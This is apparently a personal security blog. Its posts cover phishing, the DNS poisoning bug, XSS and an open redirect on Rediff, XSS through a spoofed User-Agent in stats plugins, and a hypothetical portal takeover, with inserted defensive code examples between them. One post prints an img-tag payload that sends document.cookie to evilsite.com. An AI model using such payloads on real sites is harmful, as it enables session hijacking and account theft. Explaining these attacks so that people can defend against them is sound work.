Aug 03

Recently, there has been too much action when it comes to email accounts. A couple of friends complained that they lost their logins all of a sudden. One friend from college complained that his girl’s email account was compromised. They believe that some hacker in Brazil opened his terminal and typed ./hack user@gmail.com to hack them. A few really think it is as simple as opening Microsoft Word and writing “Access Granted” in green.

I want to tell them one thing. These days, most email services are fairly secure (*cough* *cough*, not talking about Rediff, which added SSL login only a month ago, or Indiatimes, which used to save the password in a cookie as plain text). I’m talking about services like Gmail or Yahoo. But we need to accept the fact that even though we are intelligent and have some protection on our computers, like antivirus and firewalls for the Windows folks, or, as my friend Hari tells you, install Linux, or as Ashok suggests, OS X … we are busy most of the time. Sometimes we don’t use our brain while doing small things.

You would be talking to your friend on your mobile phone and checking Orkut for new scraps. The guy on the phone might be telling you about his new project or something like that and you are involved in the chat. There could be a scrap from a girl … Karteek, a greeting card for you!!! As usual, we click on the link, it tells you that you need to login to view the card, and you just login while talking on the phone.

[Recap]

What happened ? -> You clicked on the link

After that ? -> It asked you to login

Then ? -> You logged in

Then -> It might tell you to login again as your password is wrong

After that ??? -> You logged in or it logged you in automatically or you just left it

Now, the analysis part. Well, nothing big happened. You were just phished. You tried to login to a service on a fake login screen. You might lose many things through that username and password (your email may hold a lot of information).

Now, coming to the important part: how to escape from it? Well, be careful is my answer. But I know that I told you that we might just get carried away sometimes. For that I coded a small Greasemonkey script which will protect you from low level phishing attacks. Yes, only low level. If the hacker is intelligent, he can game it easily, but most of the time intelligent hackers have much more useful things to do than to hack you. So, don’t worry much about it.

The script is well commented. It doesn’t do wonders but just serves the purpose. Feel free to edit it, make it more useful and share it with others. I don’t care about licenses, so I don’t mind even if you tell your girlfriend that you coded it to protect her from being phished ;)

Very important. Never ever install a Greasemonkey script unless you have read it and are damn sure that it’s secure. Anyway, you can find the script here.

Update: Code made a little more logical. Now it won’t annoy as much. And by default, I made it support Google, Yahoo, Hotmail and Wordpress. Adding other services is very easy.
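A version of that check as an added example (JavaScript; not the post’s own Greasemonkey script): the decision logic is kept in plain functions so it can be tested outside a browser, and the service domain lists and brand words are assumptions for illustration, not a maintained list.

```javascript
// Checks a login form the way the post's script does, at a "low level":
// a form is fine only when the page host and its submit target both belong
// to one known service. Domain lists and brand words are assumed examples.
const KNOWN_SERVICES = {
  google:    { domains: ['google.com', 'gmail.com'],            brands: ['gmail', 'google'] },
  yahoo:     { domains: ['yahoo.com'],                          brands: ['yahoo'] },
  hotmail:   { domains: ['hotmail.com', 'live.com', 'msn.com'], brands: ['hotmail', 'windows live'] },
  wordpress: { domains: ['wordpress.com'],                      brands: ['wordpress'] },
};

// Exact match or a subdomain of `domain`; 'evilgoogle.com' does not match 'google.com'.
function hostMatches(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

// Name of the known service that owns `host`, else null.
function serviceForHost(host) {
  const h = host.toLowerCase();
  return Object.keys(KNOWN_SERVICES).find(n => KNOWN_SERVICES[n].domains.some(d => hostMatches(h, d))) || null;
}

// Name of the known service the page title claims to be, else null.
function serviceFromBranding(title) {
  const t = title.toLowerCase();
  return Object.keys(KNOWN_SERVICES).find(n => KNOWN_SERVICES[n].brands.some(b => t.includes(b))) || null;
}

function assessLoginForm(pageUrl, formAction, pageTitle) {
  const page = new URL(pageUrl);
  const target = new URL(formAction || '', page);   // relative actions resolve against the page
  const pageSvc = serviceForHost(page.hostname);
  const targetSvc = serviceForHost(target.hostname);
  const claimed = serviceFromBranding(pageTitle || '');
  if (target.protocol !== 'https:') return { ok: false, reason: 'password would be sent without TLS' };
  if (pageSvc && targetSvc === pageSvc) return { ok: true, reason: `genuine ${pageSvc} login` };
  if (pageSvc) return { ok: false, reason: `${pageSvc} page posts credentials to foreign host ${target.hostname}` };
  if (claimed) return { ok: false, reason: `looks like ${claimed} but is hosted on ${page.hostname}` };
  return { ok: false, reason: 'unknown site asking for a password; do not reuse your mail password here' };
}

// Browser hookup, the part a userscript would run on every page; skipped under Node.
if (typeof document !== 'undefined') {
  for (const form of document.querySelectorAll('form')) {
    if (!form.querySelector('input[type=password]')) continue;
    const verdict = assessLoginForm(location.href, form.getAttribute('action'), document.title);
    if (!verdict.ok) { form.style.outline = '4px solid red'; alert('Login check: ' + verdict.reason); }
  }
}
```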

Aug 01

Guess you know what DNS is?
If you don’t know what it is …
It’s the Domain Name System. All servers have a set of numbers to identify them (an IP address); to recognize them easily we give them a name (a domain name), and for the internet to work, DNS maps these names to numbers. (Duh, read Wikipedia for more info)

For the techie folks who know what DNS is, you might have missed this news. There was a bug. It was just a bug while people didn’t know about it. A few days ago it became a problem, as bad people knew that it exists. A couple of days ago it became a major problem, as bad people got to know how to tame the bug and exploit it. And today, it’s a frigging Pain in the A** as our dumb ISPs are not fixing their DNS servers.

Well, the bug is that bad people can manipulate DNS lookups. Which literally means that when you open Google.com, they can send you to Yahoo.com instead. Search engines need not be a problem, but if they manipulate the DNS of a bank … the answer is … somebody is gonna get hurt real badddddd

So, I request you to check (@Doxpara) whether your DNS server is vulnerable to this bug or not, and if it is, change it to OpenDNS (208.67.222.222 and 208.67.220.220) and stay secure. As of today, I’ve tested the BSNL and Airtel DNS servers (Chennai) and both of them are vulnerable. Guess we need to take a huge rod and shove it up someone’s a** and make them fix their DNS servers so that we can stay secure.

For the extra-super-terrestrial technical folks, I need not tell you about this, but in case you missed it, check (@Securebits) the exploit that was released.
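An added example, not Doxpara’s test, of the kind of check it performs: a resolver patched for this bug uses a fresh random source port for every outbound query, an unpatched one reuses a fixed port or a counter, and this scores a sample of (port, txid) pairs observed leaving the resolver; the samples are constructed.

```javascript
// A resolver patched for this bug sends each outbound query from a random
// source port; an unpatched one reuses a fixed port (or a counter), leaving
// only the 16-bit transaction ID for a forger to guess. Score a sample of
// (port, txid) pairs seen leaving the resolver. Samples below are constructed.
const PATCHED_SAMPLE = [
  { port: 41753, txid: 9012 }, { port: 5811, txid: 61203 }, { port: 60237, txid: 310 },
  { port: 18844, txid: 44871 }, { port: 33020, txid: 27455 }, { port: 50119, txid: 7730 },
];
const FIXED_PORT_SAMPLE = PATCHED_SAMPLE.map(s => ({ port: 53, txid: s.txid }));
const COUNTER_SAMPLE = PATCHED_SAMPLE.map((s, i) => ({ port: 32768 + i, txid: s.txid }));

// Shannon entropy (bits) of the values actually observed in the sample.
function sampleEntropyBits(values) {
  const counts = new Map();
  for (const v of values) counts.set(v, (counts.get(v) || 0) + 1);
  let h = 0;
  for (const c of counts.values()) { const p = c / values.length; h -= p * Math.log2(p); }
  return h;
}

// True when the values form a plain counter (each one is the previous plus one).
function isCounter(values) {
  return values.length > 1 && values.every((v, i) => i === 0 || v === values[i - 1] + 1);
}

// Verdict on the resolver's source-port behaviour from the captured sample.
function assessResolver(samples) {
  const ports = samples.map(s => s.port);
  const portBits = sampleEntropyBits(ports);
  const txidBits = sampleEntropyBits(samples.map(s => s.txid));
  const maxBits = Math.log2(samples.length);   // the most a sample this size can show
  let verdict;
  if (new Set(ports).size === 1) verdict = 'vulnerable: fixed source port';
  else if (isCounter(ports)) verdict = 'vulnerable: sequential source ports';
  else if (portBits < 0.9 * maxBits) verdict = 'weak: source ports repeat more than expected';
  else verdict = 'ports look randomized';
  return { portBits, txidBits, verdict };
}
```

A handful of captured queries is only a smoke test; the remedy for a bad verdict is the one above, a patched or different resolver, not tuning the thresholds.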

Jan 19

Something more free from Rediff ?
Hell Yeah.

Whats that ?
URL redirection service.

Ads ?
Come on, it’s Rediff, there will be ads.

What makes it different from other URL redirection services ?
Other URL redirection services are built on purpose. Here, even Rediff doesn’t know that it got one too!!!

What ?
Okay, in clear words, yet another stupid implementation by Rediff.

Where ?
here - > http://www.rediff.com/login/inredirect.php?url=http://karteek.selfdabba.com

What does it do ?
Arghh !!! Click on it !! -> K World

Wow. Anything more in it ?
Uhmm, you want more and Rediff will never say no. Yeah, it has XSS in it too.

Double Wow. Show me, show me !!
Well, I can’t say no either. Click this.

Can I use it for anything more ?
Hell, yeah. How about printing your name there on that page ?

Triple Wow. Show me, show me.
Dude, not going to show you this. But, yeah, I will give you a hint: document.write in JavaScript. And you know how to inject JavaScript into that page.

What ? Do I know ?
Fck. That’s why I should have kept a disclaimer at the top that this post ain’t for everyone. XSS is Cross Site Scripting, where you would just inject JavaScript into another site.

Oh. okay. What do I do now ?
Uhmm, how about a fair deal? I will show you all the bugs I/others found in Rediff and you stop using it?

Yeah. I’m in.
Just go to Xssed.com and search for rediff. Lazy guys like me, click this.
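An added example, not Rediff’s code, of how a redirect endpoint like the inredirect.php?url= one above should validate its target so that it is neither an open redirector nor a script-injection point; SITE_HOST and ALLOWED_HOSTS are hypothetical names.

```javascript
// Decide whether a user-supplied `url` parameter may be followed. Only a
// same-site path or an allowlisted host over http(s) is accepted; off-site
// hosts, javascript:/data: URLs, protocol-relative '//host' forms and
// userinfo tricks are refused. SITE_HOST and ALLOWED_HOSTS are hypothetical.
const SITE_HOST = 'www.portal.example';
const ALLOWED_HOSTS = new Set([SITE_HOST, 'mail.portal.example']);

// Returns the normalized target to redirect to, or null if it must be refused.
function safeRedirectTarget(rawUrl) {
  if (typeof rawUrl !== 'string' || rawUrl.length === 0) return null;
  // Browsers strip control characters and whitespace before parsing, which can
  // hide a scheme; refuse such input instead of guessing how it will be read.
  if (/[\u0000-\u0020]/.test(rawUrl)) return null;
  // Same-site path: a single leading '/', not '//host' or '/\host'.
  if (/^\/(?![\/\\])/.test(rawUrl)) return rawUrl;
  let u;
  try { u = new URL(rawUrl); } catch (e) { return null; }   // bare words, relative junk, etc.
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  if (u.username !== '' || u.password !== '') return null;   // http://trusted@evil/ confusion
  if (!ALLOWED_HOSTS.has(u.hostname)) return null;            // hostname is already lowercased
  return u.href;
}

// Convenience for a handler: where to send the user when `url` is bad.
function redirectLocation(rawUrl, fallback = 'https://' + SITE_HOST + '/') {
  return safeRedirectTarget(rawUrl) || fallback;
}
```

Whatever the endpoint echoes back into its HTML (for instance the rejected value in an error message) still has to be HTML-escaped; this function only decides the Location target.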

Nov 18

Well, it’s not just a funny way, but a very funny way. Neither through an HTTP GET nor an HTTP POST, but through a header. I hadn’t read about this method of XSS until now, but seriously, it’s silly and common. Usually webmasters read about the traffic of their websites, and Referer and User-Agent are very common headers they analyze to know the type of visitors and which site they are coming from.

I just spoofed my User-Agent header to “<script>alert(1)</script>”, and when I saw the stats page after that, guess what, my stats plugin wasn’t sanitizing the input, and I got the alert window.

Now, going back to fix and report it. Take care when looking at your stats (especially in WordPress). Rather than keeping an alert, one can keep something like this:

<img
src="javascript:document.images[1].src=%22http://evilsite.com/cookie.php?c%3D+document.cookie;"
style=visibility:hidden />

The above code will send the cookie to the cookie.php page of evilsite.com, and the hacker can collect the cookies there using very simple code and become you just by using those cookies. This page has many vectors to use. It doesn’t teach you how to use them, so if you really know what you have to do, you must know this page already.

Result: check your stats plugins and make sure that they are sanitizing all the inputs. Just don’t trust them. They can be very dangerous. Finishing yet another episode of “How do THEY do it?”
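An added example, not the post’s stats plugin or any WordPress code: a tiny stats table renderer with the defect described above beside the fixed version, plus a scan over constructed log records that flags requests whose headers carried markup.

```javascript
// A stats page builds HTML from request headers. Header values are chosen by
// whoever sent the request, so they must be escaped like any other untrusted
// input. The log records are constructed; the hostile UA is the post's own.
const SAMPLE_HITS = [   // constructed log records, not real traffic
  { ip: '203.0.113.10', referer: 'http://blog.example/post-1', ua: 'Mozilla/5.0 (X11; Linux) Firefox/3.0' },
  { ip: '198.51.100.7', referer: '', ua: '<script>alert(1)</script>' },
  { ip: '192.0.2.44', referer: 'javascript:void(0)', ua: 'curl/7.18' },
];

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// The bug: raw header strings are written into the admin page as markup.
function renderStatsUnsafe(hits) {
  return hits.map(h => `<tr><td>${h.ip}</td><td>${h.referer}</td><td>${h.ua}</td></tr>`).join('\n');
}

// The fix: every value is escaped at the point where it enters HTML.
function renderStats(hits) {
  const cell = v => `<td>${escapeHtml(v)}</td>`;
  return hits.map(h => `<tr>${cell(h.ip)}${cell(h.referer)}${cell(h.ua)}</tr>`).join('\n');
}

// Log review: IPs whose Referer or User-Agent carried tag-like or script-like content.
const MARKUP_IN_HEADER = /<\s*\/?\s*[a-z]|javascript\s*:|\bon[a-z]+\s*=/i;
function findSuspiciousHeaders(hits) {
  return hits.filter(h => MARKUP_IN_HEADER.test(h.ua) || MARKUP_IN_HEADER.test(h.referer)).map(h => h.ip);
}
```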

Oct 25

This post is going to be technical. Some truth, some imagination and a bunch of assumptions.

My first assumption is: there is a big company with a portal which is the primary means of doing many things across the company. Every employee gets access to the portal, which they use daily.

My second assumption is: the company turns new-technology oriented, and it starts its own wiki or micro-blogging or even blogging within the enterprise.

My third assumption is: the company considers an open source solution for the tool and modifies it a lot, so that by the time it opens the tool to regular employees, the open source solution they started from has had an upgrade with patches for the vulnerabilities still present in their version.

My fourth assumption is: the company, having gone to the trouble of modifying the code to make it work seamlessly with their current environment, wouldn’t take the extra pain of upgrading the version of the open source solution they are using.

Out of these four assumptions, we get a situation with a weakest link: a modified-but-vulnerable open source solution integrated with a company’s portal.

My brain’s assuming part will stop working here and the imagination part starts. When a new tool is integrated seamlessly with the portal, it would be using LDAP for authentication. It’s a guess that is easy to make and easy to confirm. When LDAP is being used, the next interesting imagination would be that they use a flow where, if a user tries to login for the first time, the open source solution creates a profile for him in the solution’s database, and otherwise it just lets him in based on the LDAP authentication.

All of the above will work great as long as They are not concentrating on you. But when They concentrate on you, the greatest code will look like simple, vulnerable code. As per the title, I’m going to write “How Would They Do It?” Again, it’s completely imagination, as I’m not “good enough in skill” or “bad enough in motive” to be one of Them. Let’s see what They would do.

They will find that the latest added open source solution is the weakest part of the portal and try to find out the version of the solution. Using the version, they would find the list of vulnerabilities and try to exploit them. If they succeed at this point, they will try to get complete access over that open source solution, a.k.a. the new tool. They will make themselves admin on the new tool and look for possible chances of going further. Some of the current open source solutions are so advanced that they allow editing the code of their plugins/themes/core through their interface if the user is an administrator. If not that advanced, at least they allow the administrator to take a backup of the complete database. Both cases are bad, the first being terrible and the second being bad enough to hurt.

But in the first case, where They got admin rights and can edit the code, They would simply edit the code to do their work, and that is: the solution would add every user and his password to a new table on successful authentication, and later They can download the database of users with their un-hashed passwords, which is the biggest thing that can go wrong for the whole portal. The total compromise.

This is some stupid theory with lots of facts, assumptions and imagination in it. If you understand technology, you can understand the seriousness of the simple mistakes we make. If you don’t understand technology, I didn’t expect you to be so bored that you read this post!! And by the way, if you haven’t understood who They are … come on dude, it’s the dream of every kid who uses a computer to become like Them and read their friends’ emails. No more hints.